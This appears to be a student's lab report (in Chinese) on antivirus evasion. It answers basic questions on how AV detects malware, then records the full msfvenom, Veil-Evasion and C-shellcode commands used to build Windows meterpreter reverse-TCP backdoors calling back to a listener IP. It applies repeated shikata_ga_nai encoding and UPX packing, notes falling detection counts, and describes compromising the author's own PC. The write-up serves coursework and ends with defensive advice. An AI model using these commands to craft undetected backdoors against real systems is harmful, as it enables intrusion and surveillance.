Exp3 免杀原理与实践 20154308张珊珊
一、基础问题回答
-
杀软是如何检测出恶意代码的?
- 根据特征来检测:恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。
- 根据行为来检测:如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码,有时候不是恶意代码的程序也会把查杀,因为这些程序做了一些计算机认为不安全的事情,比较常见的就是各自破解补丁或者游戏外挂等。
- 启发式检测:根据些片面特征去推断。通常是因为缺乏精确判定依据。
-
免杀是做什么?
- 使恶意软件不被AV检测出来
-
免杀的基本方法有哪些?
- 改变特征码
- 改变行为
二.实践过程
2.1 使用msf生成的后门程序
linux终端:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor.exe
(linux的ip地址)
将生成的后门文件上传到virscan网站扫描,发现有19个软件都能发现
接下来我们通过改变特征码的方法来实现免杀:
- 编码一次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor1.exe
然而并没有什么用
- 编码十次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor2.exe
可以看出报毒的引擎减少到16个。效果似乎并没有那么明显,根据课上所学,可能是因为编码之后总是会有差不多类似的头部来解释如何将文件还原,而杀毒软件刚好就利用这一特征进行杀毒,所以还是特征码的问题。
2.2 使用veil-evasion生成的后门程序
veil-Evasion是一个与Metasploit有点类似的软件,已经在kali虚拟机里,如果没有可以进行在线安装:sudo apt-get install veil-evasion
但是我没有成功,所有接下来的这部分实验是用同学的电脑完成的
在终端下输入指令veil
即可打开软件,根据提示依次键入以下指令:
use python/meterpreter/rev_tcp
//设置payload
set LHOST 172.30.6.226
//设置反弹连接IP
set port 4308
//设置反弹端口4308
generate
//生成
backdoor3
//程序名
1
生成的文件可以在 其他位置->电脑 里按照它提示的目录找到
检测之后发现报毒软件少了很多,但还是有。
2.3 C语言调用Shellcode
- 在Kali里生成一个C语言格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.130 LPORT=4308 -f c
- 然后我选择在自己的物理机win10上编写一个c文件,就是将讲义中的代码段替换成上面linux生成的代码,并进行编译。(应该在后面运行,之前没截图)(在这个过程中我的360没有给我任何报警,真是难过)
- 在linux下进入MSF打开监听进程,跟之前做的实验步骤一样,这时候在win10下运行之前的c文件,这时候linux就轻易的侵入了我的电脑
试一下上次没成功的拍照功能
这次成功了
- 接下来,我们找到运行生成的exe文件,送去查杀
只有少数软件报毒,和之前的19个还是有很明显的对比的。
再送去360看看(专门查杀这个exe文件)
真是一如既往的让人难过,没有任何反应。
2.4 加壳
直接用upx将之前生成的c.exe文件加壳,改个文件名
送去查杀
报毒软件又少了一个。虽然还不太明白加壳是什么意思,但是能看到有一点点免杀的作用。
三. 离实战还缺些什么技术或步骤?
- 如何将我们制作的后门程序传到靶机上并且让他运行,钓鱼网站做的应该就是这个事情,虽然我不会。
- 如何获得一个稳定的ip去监听靶机。
四. 实验总结
- 这次的实验本身并不是特别难,但是我花了很长时间在安装veil这个软件上,最后还没有成功,用了别人的电脑,但是不会气馁,会继续学习。
- 有一点点小小的遗憾是没有去进一步想各种办法让更少的软件报毒,电脑太卡或者软件装不上等等都是我的借口。
- 最大的感慨是我的360安全卫士竟然如此鸡肋,别人的360或多或少还能察觉一点异样。杀毒软件的薄弱在本次实验中一目了然,所以以后在网络中要“洁身自好”,不轻易点击不明链接,不轻易下载来历不明的第三方软件,定时更新病毒库、查毒、杀毒。